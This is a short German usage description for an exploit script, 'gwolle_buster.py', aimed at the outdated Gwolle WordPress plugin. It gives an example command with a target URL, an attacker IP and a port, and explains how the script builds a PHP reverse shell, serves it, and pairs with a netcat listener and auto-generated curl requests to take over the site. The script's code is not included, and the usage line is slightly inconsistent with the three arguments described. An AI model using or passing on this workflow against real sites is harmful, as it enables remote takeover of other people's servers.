
Dieses Skript ist ein Exploit für das alte WordPress-Plugin Gwolle
Dieses Skript ist ein Exploit für das alte WordPress-Plugin gwolle.
Verwendung:
./gwolle_buster.py <target_url>
erstes Argument <target_url> => die Ziel-URL der WordPress-Installation, die gwolle installiert hat zweites Argument => Ihre IP drittes Argument => Listening-Port für die Reverse Shell
Beispiel: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
Dieses Skript generiert das PHP-Reverse-Shell-Skript und startet den einfachen Server. Sie müssen zwei neue Terminals öffnen und im ersten Terminal Netcat lauschen lassen und dann mit Curl-Befehlen die Anfrage senden. Die Befehle werden jedoch automatisch generiert und auf der Konsole angezeigt, sodass Sie sie einfach kopieren und einfügen können.